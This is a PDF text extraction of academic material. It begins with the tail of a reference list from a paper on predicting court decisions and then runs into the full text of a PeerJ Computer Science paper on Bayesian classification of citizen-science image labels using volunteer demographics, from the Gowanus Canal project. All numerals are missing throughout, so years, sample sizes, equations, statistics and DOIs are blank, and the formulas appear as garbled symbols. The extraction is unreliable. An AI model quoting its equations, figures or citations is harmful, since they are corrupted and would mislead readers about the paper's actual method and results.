ts. . the supreme court’s many median justices. american political science review ( ): – doi . /s . lauderdale be, clark ts. . scaling politically meaningful dimensions using texts and votes. american journal of political science ( ): – doi . /ajps. . aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / lawlor rc. . what computers can do: analysis and prediction of judicial decisions. american bar association journal : – . leach p. . taking a case to the european court of human rights. oxford: oxford university press. leach p, paraskeva c, uelac g. . human rights fact-finding. the european court of human rights at a crossroads. netherlands quarterly of human rights ( ): – . leiter b. . naturalizing jurisprudence: essays on american legal realism and naturalism in legal philosophy. oxford: oxford university press. leiter b. . legal formalism and legal realism: what is the issue? legal theory ( ): – doi . /s . llewellyn kn. . the common law tradition: deciding appeals. william s. hein & co., inc.. miles tj, sunstein cr. . the new legal realism. the university of chicago law review ( ): – . nagel ss. . applying correlation analysis to case prediction. texas law review : . pildes rh. . forms of formalism. the university of chicago law review ( ): – doi . / . popple j. . a pragmatic legal expert system. applied legal philosophy series, dart- mouth (ashgate), aldershot. posner ra. . legal formalism, legal realism, and the interpretation of statutes and the constitution. case western reserve law review : – . pound r. . mechanical jurisprudence. columbia law review ( ): – . preoţiuc-pietro d, lampos v, aletras n. . an analysis of the user occupational class through twitter content. in: proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers). – . preoţiuc-pietro d, volkova s, lampos v, bachrach y, aletras n. . studying user income through language, behaviour and affect in social media. plos one ( ): – doi . /journal.pone. . priest gl, klein b. . the selection of disputes for litigation. the journal of legal studies ( ): – doi . / . salton g, mcgill mj. . introduction to modern information retrieval. new york: mcgraw-hill, inc. salton g, wong a, yang c-s. . a vector space model for automatic indexing. communications of the acm ( ): – doi . / . . schauer f. . prediction and particularity. boston university law review : . segal ja. . predicting supreme court cases probabilistically: the search and seizure cases, – . american political science review ( ): – doi . / . segal ja, spaeth hj. . the supreme court and the attitudinal model revisited. cambridge: cambridge university press. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / sim y, routledge br, smith na. . the utility of text: the case of amicus briefs and the supreme court. in: twenty-ninth aaai conference on artificial intelligence. tamanaha bz. . beyond the formalist-realist divide: the role of politics in judging. princeton: princeton university press. tsarapatsanis d. . the margin of appreciation doctrine: a low-level institutional view. legal studies ( ): – doi . /lest. . turney pd, pantel p. . from frequency to meaning: vector space models of semantics. journal of artificial intelligence research : – . vapnik vn. . statistical learning theory. new york: wiley. von luxburg u. . a tutorial on spectral clustering. statistics and computing ( ): – . wang s, manning cd. . baselines and bigrams: simple, good sentiment and topic classification. in: proceedings of the th annual meeting of the association for computational linguistics: short papers-volume . – . aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / using demographics toward efficient data classification in citizen science: a bayesian approach using demographics toward efficient data classification in citizen science: a bayesian approach pietro de lellis , , shinnosuke nakayama and maurizio porfiri , department of electrical engineering and information technology, university of naples federico ii, naples, italy department of mechanical and aerospace engineering, new york university tandon school of engineering, brooklyn, ny, usa department of biomedical engineering, new york university tandon school of engineering, brooklyn, ny, usa abstract public participation in scientific activities, often called citizen science, offers a possibility to collect and analyze an unprecedentedly large amount of data. however, diversity of volunteers poses a challenge to obtain accurate information when these data are aggregated. to overcome this problem, we propose a classification algorithm using bayesian inference that harnesses diversity of volunteers to improve data accuracy. in the algorithm, each volunteer is grouped into a distinct class based on a survey regarding either their level of education or motivation to citizen science. we obtained the behavior of each class through a training set, which was then used as a prior information to estimate performance of new volunteers. by applying this approach to an existing citizen science dataset to classify images into categories, we demonstrate improvement in data accuracy, compared to the traditional majority voting. our algorithm offers a simple, yet powerful, way to improve data accuracy under limited effort of volunteers by predicting the behavior of a class of individuals, rather than attempting at a granular description of each of them. subjects algorithms and analysis of algorithms, scientific computing and simulation keywords citizen science, bayesian estimation, data classification, algorithms introduction involvement of crowds in the creation of goods and services has become a powerful and successful model to achieve goals (howe, ). crowdsourcing can take various forms, which can be classified based on types of contributions and motivations, with openness to the public as a common feature (franzoni & sauermann, ; sauermann & franzoni, ). for example, some crowdsourcing platforms recruit crowdworkers to undertake microtasks (difallah et al., ), and others seek for innovative ideas and solutions (penin & burger-helmchen, ; estellés-arolas & gonzález-ladrón-de guevara, ; majchrzak & malhotra, ; cappa, rosso & hayes, ) or money (lehner, ; belleflamme, lambert & schwienbacher, ), by extrinsically motivating the crowds with rewards. over the past decades, participation in scientific activities by public volunteers, often called citizen science, has emerged as a new tool to conduct science at an unprecedentedly large scale (silvertown, ; bonney et al., ). citizen science is uniquely positioned in crowdsourcing typologies, as the crowds contribute to science how to cite this article de lellis p, nakayama s, porfiri m. . using demographics toward efficient data classification in citizen science: a bayesian approach. peerj comput. sci. :e doi . /peerj-cs. submitted june accepted october published november corresponding author maurizio porfiri, mporfiri@nyu.edu academic editor jingbo wang additional information and declarations can be found on page doi . /peerj-cs. copyright de lellis et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:mporfiri@�nyu.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ through intrinsic motivation on voluntarism, rather than extrinsic motivation based on receiving rewards (ryan & deci, ; nov, arazy & anderson, ; cappa et al., ). with prevalence of the internet, citizen science now attracts diverse people to contribute to research projects by collecting and analyzing raw data online at their convenience. popular and successful citizen science projects include ebird, where volunteers upload the locations of observed birds (https://ebird.org), and eyewire, where volunteers reconstruct retinal neurons in d from d images (https://eyewire.org). although citizen science enables scientists to acquire a large amount of processed data, it may come at the expense of data quality. since the data are collected and analyzed by the untrained public, they might suffer from low quality, challenging contribution to science (dickinson, zuckerberg & bonter, ; kosmala et al., ; kallimanis, panitsa & dimopoulos, ). therefore, it is of interest to citizen science practitioners to enhance the quality of data, while making good use of volunteers’ effort. a common practice in citizen science builds upon the wisdom of the crowd, whereby scientists distribute the same tasks to multiple participants and then aggregate the data (swanson et al., ). beyond aggregation rules, sophisticated methods have been proposed in the field of crowdsourcing to tackle the so-called noisy labeler problem (sheng, provost & ipeirotis, ; frenay & verleysen, ). one of the most notable methods employs an expectation-maximization algorithm (dawid & skene, ), where the ground truth and the reliability of labelers are simultaneously estimated through an iterative procedure to maximize the likelihood of the model parameters. the method can also be extended into a bayesian framework for more accurate estimation of ground truth and labeler reliability (raykar et al., ; kim & ghahramani, ). however, having a granular characterization of each participant could be practically unfeasible or not convenient. indeed, this would require every volunteer to participate in a preliminary session in which their accuracy would be thoroughly characterized. this might represent an unacceptable misuse of the volunteers’ time, and it will likely be unfeasible in realistic cases where the volunteers contribute only for a very limited time (nov, arazy & anderson, ). an economical solution to mitigate the redundancy of volunteers’ effort is to collect labels on the same instance repeatedly from different labelers until it meets a threshold defined by a requester (chen, lin & zhou, ; li et al., ). further, in dynamic task allocation, a next instance to be labeled is selected from a pool of instances through a bayesian markov decision process, which identifies the instance that would maximize a reward function if it were labeled next (chen, lin & zhou, ). in this way, requesters can minimize the effort of labelers, while maintaining adequate data quality. however, the basic algorithm assumes that all labelers have equal reliability, which is unlikely true in citizen science. while the approach can be extended to estimate both ground truth and labeler reliability simultaneously in sequential task allocation, it might become unfeasible in citizen science to accurately estimate reliability of each volunteer with only a few instances of labels (nov, arazy & anderson, ). thus far, the diversity of volunteers in citizen science poses a challenge to accurately estimating the ground truth, but it may be possible to turn the tables and harness this de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://ebird.org https://eyewire.org http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ diversity to enhance data accuracy. since citizen science welcomes everyone by nature, volunteers belong to a wide demographic, with diverse age and educational level (cappa et al., ; burgess et al., ), as well as motivations (nov, arazy & anderson, ; curtis, ; cappa et al., ). these individual attributes could provide additional information toward enhancing data accuracy while safeguarding volunteers’ effort. for example, the motivational level explains both quality and quantity in citizen science (nov, arazy & anderson, ), and the educational level is positively related to the accuracy of identifying invasive species (delaney et al., ). in a bayesian sense, this information may help enhance data accuracy by affording an informative prior distribution of reliability for each individual attribute. a bayesian framework has been used by garriga, piera & bartumeus ( ) to evaluate and rank participants in citizen science projects based on their reputation, with the final goal of increasing the likelihood of engagement and the overall data quality. here, we investigate the possibility of employing a bayesian approach to enhance classification accuracy by harnessing diversity of volunteers in citizen science. specifically, this study aims at improving the accuracy of noisy data by incorporating information about demographics of volunteers into a bayesian framework and dynamically distributing tasks among a limited number of volunteers. we use data collected within a citizen science project, the brooklyn atlantis (laut et al., ), where volunteers performed binary classification tasks. the study aimed at monitoring the environment of the gowanus canal (brooklyn, ny), a highly polluted body of water in the usa. volunteers were presented with images of the canal and asked to classify the objects in the images, by assessing whether they might represent a threat to the environment (torre et al., ). before classifying the image, they were asked selected demographic information, which were not analyzed in torre et al. ( ), whose focus was on improving data accuracy by providing a possibility to cast blank votes in a classification task. specifically, the degree of interest of the volunteers toward the environment and their level of education were recorded. using the dataset of torre et al. ( ), we applied a bayesian approach that leverages these individual attributes for enhancing the classification efficiency. to validate the approach, we allocated volunteers randomly to tasks until the theoretical accuracy of the classification overcomes a chosen threshold. we computed the average classification accuracy and number of volunteers employed as performance metrics, and compared them against the traditional majority voting approach. methods data collection the data used in this study were collected within a citizen science project for obtaining information about the status of the environmental health of the gowanus canal (brooklyn, ny, usa) (torre et al., ). the images were taken by an aquatic robot designed as part of the brooklyn atlantis project (laut et al., ), which, over the years, was used to address a number of important questions in citizen science, from the effect of design interventions to face-to-face interactions with scientists and on to improving engagement de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in rehabilitation exercises (laut et al., , ; nov, laut & porfiri, ; cappa et al., , ; palermo et al., a, b; diner et al., ; nakayama et al., ; torre et al., ). volunteers were asked to inspect the images of the canal and identify the presence of objects that could endanger the environment (torre et al., ). the images taken by the robot were uploaded on a temporary website built for this experiment, where volunteers could access them from their computers and mobile devices. before taking part in the project, participants had to log in through either a facebook profile or an email account to prevent them from performing the task more than once. after accessing the website, participants were first presented with a short movie about the scope of the project. then, participants initiated a practice session, in which they were instructed to classify whether the object in the image would represent a potential threat to the environment by clicking either a “threat,” “no threat,” or “i don’t know” button below the image. after the task was performed, the correct answer was shown together with a brief explanation. before the experiment, torre et al. ( ) identified the correct answer of each image through careful examination and discussion, and the selection of images only included those which received a unanimous classification. after the classification of two objects in the practice session, the main task started, and participants were asked to classify images consecutively, which appeared on the screen for s each. participant could choose between “threat,” “no threat,” or “i don’t know” buttons, but this time, the correct answer was not displayed. if the participant did not select any answer in s, it was recorded as “no answer.” to avoid possible confounding effects on performance, the order of the images’ display was randomized for each participant. upon completing the classification task, the participants were asked to fill out a short questionnaire where they provided information on their education level and degree of interest toward the environment. the data collection was carried out between february and june , with a total of volunteers recruited in the project. here, we focus on the of them who filled out the preliminary demographic questionnaire. all the participants were over years old and their responses were anonymized. the data collection was approved by the institutional review board of new york university (irb-fy - ). bayesian inference let us assume that a pool v ¼ f ; . . . ; ng of volunteers participates in the binary classification of a set i ¼ f ; . . . ; mg of images. in the process of classification of image i i, the unobservable binary parameter that we wish to estimate is denoted as ui. in our experiment, ui is equal to if image i contains a threat for the environment, and it is equal to otherwise. a priori, we assume that we have no cues on the possible content of that image, and therefore we set p ui ¼ ð Þ ¼ p ui ¼ ð Þ ¼ : for all i, where the subscript indicates that we refer to the probability at step , that is, before starting the classification process. after every successive classification, we propose de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to sequentially update these probabilities by using bayes’ rule (gelman et al., ). at each classification step, say j � , the observable data is the classification yil of image i performed by participant l = l(j), randomly selected from the pool v at step j. the possible outcomes of the observed variable yil are , corresponding to a late reply (the participant does not classify within s), or , corresponding to the participant classifying the image as containing or not containing a threat, respectively, and , corresponding to an uncertain participant choosing the “i don’t know” option. in a bayesian framework, the behavior of the l-th participant is characterized by the conditional probabilities pðyil ¼ ajui ¼ bÞ; ( ) for all a ∈ { , , , }, β ∈ { , }, and i i. since we do not know a priori whether some images are more difficult to classify than others, we assume that the probabilities in ( ) are independent of i, and therefore, for all i i, we write pðyil ¼ ajui ¼ bÞ ¼ pðyl ¼ ajui ¼ bÞ; ( ) which represents the probability that the classification output of the l-th participant is equal to a, given that the image contains (or does not contain) a threat (depending on the value of β). in this work, we propose that the behavior of a volunteer, say the l-th, is related to his/ her demographics (such as motivations and educational level), encoded by a vector xl of one or more integer variables. more specifically, we assume that the probabilities ( ) depend on the variables xl, which are therefore called explanatory in the bayesian literature (carlin, louis & carlin, ; gelman et al., ; garriga, piera & bartumeus, ). accordingly, based on the classification performed by the participant l(j) randomly selected at step j, and on his/her demographics, the probability that image i contains a threat for the environment can be updated in a bayesian fashion as follows: pjðui ¼ Þ ¼ pðyl ¼ a; ui ¼ ; xlÞ pðyl ¼ a; xlÞ ¼ pðyl ¼ ajui ¼ ; xlÞ; pðxl; ui ¼ Þ pðyl ¼ ajxlÞpðxlÞ ¼ pðyl ¼ ajui ¼ ; xlÞpðxljui ¼ Þpðui ¼ Þ pðyl ¼ ajxlÞpðxlÞ ; ( ) for all j � , where pj(ui = ) is defined as pj(ui = |yl = a, xl), and we omit the explicit dependence of l on j to simplify the notation. observing that xl and ui are independent, we have p(xl|ui = ) = p(xl), thus yielding pjðui ¼ Þ ¼ pðyl ¼ ajui ¼ ; xlÞpðui ¼ Þ pðyl ¼ ajxlÞ : ( ) from the law of total probability, we can write pðyl ¼ ajxlÞ ¼ pðyl ¼ ajui ¼ ; xlÞpðui ¼ jxlÞ þ pðyl ¼ ajui ¼ ; xlÞpðui ¼ jxlÞ: ( ) noting again the independence between xl and ui, and substituting ( ) into ( ), we finally establish de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pjðui ¼ Þ ¼ pðyl ¼ ajui ¼ ; xlÞpj� ðui ¼ Þ pðyl ¼ ajui ¼ ; xlÞpj� ðui ¼ Þ þ pðyl ¼ ajui ¼ ; xlÞpj� ðui ¼ Þ ; ( ) where we used as prior pj - (ui = ). once the conditional probabilities p(yl = a|ui = β, xl), for all a, β, and xj, have been estimated on a sample of volunteers, then, as a new volunteer v decides to participate in the study, we only need access to the demographics xv to characterize his/her behavior. setting a threshold . � s < , we label the image as classified at the first step t � such that either pt (ui = ) > s or pt (ui = ) < - s, and the final classification is ûi ¼ arg max b f ; g ptðui ¼ bÞ: ( ) the threshold s can be viewed as the selected confidence level for the classification. clearly, the higher s is, the higher the accuracy would be, but this would require a larger number of volunteers to classify the image. the effectiveness of the bayesian inference is intrinsically related to our knowledge of the conditional probabilities in eq. ( ). if these probabilities were fully known, the more explanatory variables we considered, the faster pj(ui = ) would converge to either or , thereby leading to a more efficient classification for a given confidence level s. however, in real applications we can only perform sample estimations of these conditional probabilities, which are typically evaluated on a small dataset. therefore, their accuracy might be undermined by the sample size, but also by a biased demographic distribution of the sample. hence, a trade-off arises in the choice of the explanatory variables: adding variables increases the theoretical classification accuracy, but the sample estimation might become less accurate due to the reduced size of the sample on which the conditional probabilities are estimated. therefore, in designing a bayesian classification algorithm, a crucial point is the selection of how many and which explanatory variables should be considered. classification algorithm we consider the degree of interest toward the environment and the level of education of the volunteers as possible explanatory variables. the interest toward the environment is encoded by the integer xl , ranging from (participant l is “not at all” interested) to (participant l is “very much” interested), while the education level is encoded by a second integer parameter xl , which increases from (“high school diploma or less”) to (“graduate or professional degree”) as the participant education level increases, while it is set to if he/she prefers not to answer. accordingly, this yields three possible choices for xl: the behavior of the participant can be evaluated based only on the degree of interest toward the environment (xl = xl ), on the education level (xl = xl ), or on both explanatory variables (xl = [xl xl ] t, where the superscript t means matrix transposition). for any possible choice of xl, adopting a bayesian approach for classification requires a preliminary estimation of the participants’ accuracy based on their demographics. specifically, this consists in estimating the conditional probabilities . this selection of the prior implies that pj ui ¼ ð Þ is also conditioned on the classifications and demographics of participants lð Þ; . . . ; lðj � Þ. de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pðyl ¼ ajui ¼ b; xlÞ; ( ) for all a ∈ { , , , }, β ∈ { , }, and all possible values of xl. to this aim, we consider the set of volunteers v who filled out the demographic questionnaire, and partition it in two groups, denoted t and c, respectively. the set t encompasses the volunteers used to compute the sample estimations bpðyl ¼ ajui ¼ b; xlÞ ( ) of the conditional probabilities in eq. ( ), and is called training set in the following, while the set c ¼ v � t is used for testing the performance of the bayesian approach. namely, each image i i is classified as a result of the following steps: � initialization: the prior is set to bp ðhi ¼ bÞ ¼ p ðhi ¼ bÞ ¼ : , β = , , and the set of volunteers available for classification at step is a ¼ c; a threshold s is selected in the interval : ; ð Þ; � step j � : a participant l = l(j) is randomly selected in aj� , which is updated as aj ¼ aj� � flðjÞg; ( ) and the estimated probabilities bpjðu ¼ bÞ, β ∈ { , }, leveraging the sample estimations ( ), are computed as bpjðui ¼ Þ ¼ bpðyl ¼ ailjui ¼ ; xlÞbpj� ðui ¼ Þbpðyl ¼ ailjui ¼ ; xlÞbpj� ðui ¼ Þ þ bpðyl ¼ ailjui ¼ ; xlÞbpj� ðui ¼ Þ ; ( ) and bpjðhi ¼ Þ ¼ � bpjðhi ¼ Þ, where ail is the output of the classification of image i performed by participant l; and � termination: the algorithm terminates at the first step t such that either at ¼ [ or max bptðui ¼ Þ; bptðui ¼ Þ n o . s: ( ) similar to eq. ( ), the i-th image is classified as ĥi ¼ arg max b f ; g bptðui ¼ bÞ; and the number of participants used to classify image i is recorded as ni = t. performance analysis out of the volunteers who participated in the study, we focus on the who filled out the questionnaire, so that jvj ¼ . our goal is to determine whether the bayesian approach can successfully leverage demographic information, and which individual attributes should be used as a proxy of reliability. furthermore, we seek to evaluate the impact on the overall performance of the termination threshold s, which is varied in the set ( . , ) with step . . then, for each value of s and for all the three possible selections of xl, we evaluate the performance of the classification algorithm in terms of the average number ν of volunteers employed, computed as m ¼ pi i ni= ij j; with ni being the number of de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ volunteers considered to classify the i-th image, and of classification accuracy w, evaluated as the fraction of the images that is correctly classified. the ground truth used to evaluate w is represented by the preliminary classification performed by torre et al. ( ). we notice that the performance of the classification algorithm might be biased by the choice of the set of volunteers t employed for estimating the conditional probabilities ( ), and by the specific classification order of the volunteers in the set c. we set the cardinality of the set t to , which is approximately half of the total number of volunteers, and, to avoid potential biases, we randomly pick m = , alternative selections ti, i = , : : : ,m, of the set t, and for each i we consider p = random permutations of ci ¼ v � ti. then, for each possible choice of s and xl, we compute the mean values �v and �m as �xðs; xlÞ ¼ mp xm i¼ xp j¼ xijðs; xlÞ; mðs; xlÞ ¼ mp xm i¼ xp j¼ mijðs; xlÞ; ( ) where wij and νij are the accuracy and average number of volunteers employed when using ti as the training set and considering the j-th permutation of ci as the classification sequence, respectively. for comparison purposes, we use the majority voting approach (kestler et al., ) as a reference. namely, we consider the outcome of the classification when using the same sequence and number of participants used for bayesian estimation, and compute its average value �xmvðs; xlÞ for all s and for all the three possible choices of xl. a complementary metric is the percentage π(s, xl) of all trials where the accuracy of the bayesian approach overcomes that of majority voting. to further delve into the performance difference between the two approaches and clarify the impact of the threshold s, we present receiver operating characteristic (roc) curves, typically employed to compare and select binary classifiers (fawcett, ). for each value of the threshold s, the roc curve depicts the true positive rate (tpr) against the false positive rate (fpr). the tpr is defined as the fraction of real positives (the image contains a threat) that are correctly classified as positive, while the fpr is the fraction of real negative (the image does not contains a threat) that are incorrectly classified as positive. then, for each value of the threshold s, we extract a scalar unbiased measure of accuracy, the area under the curve (auc) (powers, ). we remark that, as the threshold s modulates the number of participants employed to classify an image, and not the rate of positives, the roc curves might not be monotone as in standard roc analysis (fawcett, ). results preliminary analysis of the citizen science data in total, volunteers filled out the demographic questionnaire. table presents the demographic composition of the pool of volunteers, while tables and describe the distribution of the classifications outputs depending on the degree of interest toward the environment and on the education level, respectively. the w test for independence de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ revealed that the distributions of answers were different among xl (x = , , p < . ) and among xl (x = , , p = . ). from visual inspection, we cannot identify any trivial relationship between the classification output and demographics. lack of correlation is also supported by the kendall rank correlation coefficients ρ and ρ between the fraction of images correctly classified and the variables xl and xl , respectively. although one might expect volunteers’ accuracy to be positively correlated both with their interest toward the environment and education, we found ρ = - . and ρ = - . , suggesting an absence of a linear dependence. a closer look at the conditional distributions can help identify some non-trivial relationships between the classification outputs and demographics. for instance, from table we observe that the number of late replies is the highest when participants are “very much” interested in the environment. this could suggest that the participants are afraid to misjudge the image and then click the wrong button, due to their genuine concern for the environment. at the same time, their percentage of false positives is the lowest, table demographic composition of the pool of volunteers. xl xl n/a total n/a total note: n/a corresponds to non-valid answers. table counts of late responses, true positives, false positives, true negatives, false negatives, and “i don’t know” based on the interest toward the environment. xl true positives false positives true negatives false negatives late responses i don’t know table counts of late responses, true positives, false positives, true negatives, false negatives, and “i don’t know” based on the education level. xl true positives false positives true negatives false negatives late responses i don’t know note: none of the participants has “high school diploma or less” (xl = ) or preferred not to answer (xl = ). de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ so they seldom generate a false alarm. our bayesian estimation algorithm has the potential of leveraging this kind of less trivial nonlinear relationships between volunteers’ accuracy and demographics. bayesian inference against majority voting in bayesian estimation, the selection of the most appropriate explanatory variables is crucial for boosting its performance. although in principle the more explanatory variables we include, the better estimation we attain, the finiteness of the training sample requires a more thoughtful approach. in fig. , we compare the performance for the three alternative choices of xl, that is, the explanatory variables are either both the degree of interest toward the environment and education level (xl = [xl xl ] t), or just one of the two attributes (xl = xl or xl = xl ). from panel a, we see that, for all values of the threshold s, the accuracy decreases when both explanatory variables are considered. this outcome can be explained by considering that the sample is too small ( tj j = ) to allow for an accurate estimation of the conditional probabilities in eq. ( ) for all the possible combinations of xl and xl . furthermore, we observe that the best performance is obtained when the interest toward the environment is used as the explanatory variable. this can be expounded by looking at the demographic composition of the pool. indeed, from table we observe a more uniform distribution of the pool with respect to xl , while the level of education is skewed toward xl = , as more than the % of the participants has a graduate or professional degree. this clearly limits the accuracy in the estimation of the conditional probabilities in ( ) when xl s , thus explaining the superior accuracy associated to the choice xl = xl . the effectiveness of a bayesian approach is also confirmed by a direct comparison with the majority voting. as one can note from fig. a, for all possible choices of the explanatory variables xl and the threshold s, the average accuracy of the bayesian ba figure mean accuracy �x of the bayesian classification approach (solid lines) and of the majority voting using the same sequence of volunteers (dotted lines) (a) and percentage of trials where the bayesian approach outperforms majority voting (b) as a function of the mean average number of volunteers �n used for classification. full-size doi: . /peerj-cs. /fig- de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm is superior to majority voting when the same sequence of labelers is used. furthermore, in all cases the percentage π(s, xl) of trials in which the bayesian classification outperforms majority voting is larger than . %, see fig. b. choosing xl = xl results in a higher performance, with a peak of π(s, xl) = . % when s = . . figure illustrates how the threshold s can be used to modulate the tradeoff between accuracy and average number of volunteers employed. if the conditional probabilities ( ) were known, both the accuracy and number of volunteers should monotonically increase with s. however, this becomes nontrival when those probabilities are estimated, whereby a correct choice of the explanatory variable is crucial. for xl = xl and low values of s the average accuracy �x decreases with s, but, when the optimal choice xl = xl is made, monotonicity is regained and the more participants we use, the more the accuracy improves. a b figure mean accuracy (a) and mean number of participants (b) as a function of the threshold s. full-size doi: . /peerj-cs. /fig- a b figure roc curve (a) and area under the curve (b) as a function of the threshold for the bayesian (solid lines) and majority voting (dotted lines) classifiers. full-size doi: . /peerj-cs. /fig- de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these considerations are further confirmed by the roc analyses in fig. , as an alternative accuracy measure, the auc, is also non-monotone with s for xl = xl , while for xl = xl we can tune s to regulate the tradeoff between the auc and �m. moreover, the roc curves highlight differences between the two classifiers, where we observe a shift of the curves toward the left, such that our bayesian classifier strongly reduces the fpr. this comes at the price of a moderate decrease of the tpr. discussion in this study, we proposed a bayesian approach to enhance data quality in citizen science projects where sequential tasks have to be processed by a limited number of volunteers. by harnessing the diversity of participants in citizen science, we developed an algorithm that characterizes the behavior and accuracy of each participant based on his/her demographics. to demonstrate the effectiveness of our approach, we used data collected within the brooklyn atlantis project (torre et al., ), where participants were asked to determine if selected pictures of the gowanus canal contained potential threats for the environment or not. specifically, we posited that participants could be grouped in classes depending on their motivation to participate to the study, measured by their declared interest toward the environment, and on their level of education. following a bayesian rationale, we characterized the behavior of each class of participants on a training dataset, by estimating the probability of each possible classification output conditioned to the actual content of the image. our numerical analyses showed that, without resorting to a granular characterization of each participant, a bayesian algorithm has superior performance compared with the traditional majority voting approach (kestler et al., ). we were able to leverage the highly nonlinear relationships between the participants’ accuracy and their demographics toward higher accuracy, without increasing their workload. differently from powerful alternatives to majority voting, such as the expectation maximization algorithm (dempster, laird & rubin, ; dawid & skene, ), our approach does not require estimating the accuracy of each participant. this feature is crucial for citizen science applications, where the contribution of the volunteers might be limited to a few instances (nov, arazy & anderson, ). in our algorithm, when a new volunteer decides to participate in the study and performs a task, his/her accuracy is immediately inferred based on demographics. a key aspect of our bayesian approach is the selection of the individual attributes to group participants into classes. in this study, we examined the level of education and motivation based on the literature (nov, arazy & anderson, ; delaney et al., ), but other selections are also feasible. for example, underpinned by the person-environment fit theory (caplan, ), previous studies in crowdsourcing demonstrate improvement in data accuracy by matching task types with individual skills (ho, jabbari & vaughan, ), inherent cognitive abilities (goncalves et al., ), or past performance (jung & joon, ). in contrast to these studies, the advantage of our bayesian approach lies in predicting performance of classes of individual attributes. consequently, it can de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ accommodate nonlinearity in the relationship between individual attributes and their performance, thereby affording more relaxed assumptions in their relationship. our bayesian approach begets enhanced data accuracy with limited effort of participants by applying a prior distribution to new participants based on their demographics. this is especially advantageous in citizen science projects that involve ongoing data collection, because practitioners do not need to recalibrate the prior distribution. however, it is necessary to do so when the nature of some new tasks or the demographics of the new participants is substantially different from the training set. another consideration is the balance between the number of classes and the number of participants in each class. as demonstrated in our results, inclusion of multiple attributes does not necessarily improve accuracy. this is because the number of classes increases in a factorial way with more attributes, leading to a less accurate predictive power in each class due to small sample sizes. when possible, practitioners should ascertain that, based on some experimental knowledge they might possess, the demographic distribution of the training set would be sufficiently balanced to ensure that a sufficient number of participants would fall in each class. in the absence of an adequate experimental knowledge, a more balanced distribution of the participants in classes can be obtained by coarse-graining the explanatory variables (garriga, piera & bartumeus, ). additionally, the information on the uncertainty associated to the training phase can be propagated to the classification stage toward mitigating the detrimental impact of a small samples size on the accuracy. it is a common practice in citizen science projects to omit collecting the demographic data of volunteers, and therefore, it is unclear whether the demographics of our participants are comparable to those in typical citizen science. it requires further study to test applicability of our method of using demographics, considering that the demographics are likely to vary depending on the nature of the projects. a further caveat for the application of our method is the necessity of having a gold standard for estimating the conditional probabilities in the training set. this is relevant for applications to binary classification tasks beyond citizen science, as in medical diagnostics, where ground truth is not available (martinez et al., ). in this kind of applications, alternative tools to compare and combine classifiers could be more viable (keith, davey & boyd, ). conclusions this study contributes a solution to the noisy labeler problem, which is common in citizen science. existing methods require a large sample size to estimate individual reliability (raykar et al., ; kim & ghahramani, ), which is unfeasible in most citizen science projects with limited effort of volunteers (nov, arazy & anderson, ). our simple, yet effective, algorithm can overcome the problem by focusing on classes of volunteers in a bayesian framework. the proposed approach can be readily implemented in citizen science projects by adding a simple survey during the registration to the projects. although practitioners in citizen science projects may shy away from collecting demographic information from participants in fear of low participation, such information might offer insight into the de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ societal impact of the project by assessing the value of citizen science in education and outreach (bonney et al., ). similarly, our method can be applied to crowdsourcing for distributed data analysis (difallah et al., ) toward reducing the cost of workers for the same data accuracy, as many crowdsourcing platforms already provide multidimensional, detailed attributes of each worker. whether it is to gain from limited effort of participants in citizen science or to reduce the cost of crowdsourcing workers, predicting their performance through demographics is a simple, yet powerful, way to improve data accuracy. acknowledgements we would like to thank tyrone j. tolbert for developing the experimental platform, marina torre for collecting the data, and the three reviewers for their constructive feedback that has helped improve the work and its presentation. p.d. wishes to thank the dynamical systems laboratory at new york university for hosting him during the design of the research. additional information and declarations funding this work was supported by the national science foundation cmmi . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national science foundation cmmi: . competing interests the authors declare that they have no competing interests. author contributions � pietro de lellis conceived and designed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � shinnosuke nakayama analyzed the data, authored or reviewed drafts of the paper, approved the final draft. � maurizio porfiri conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the data collection was approved by the institutional review board of new york university (irb-fy - ). de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: data is available at the open science framework: de lellis, pietro. . “using demographics toward efficient data classification in citizen science: a bayesian approach.” osf. november . 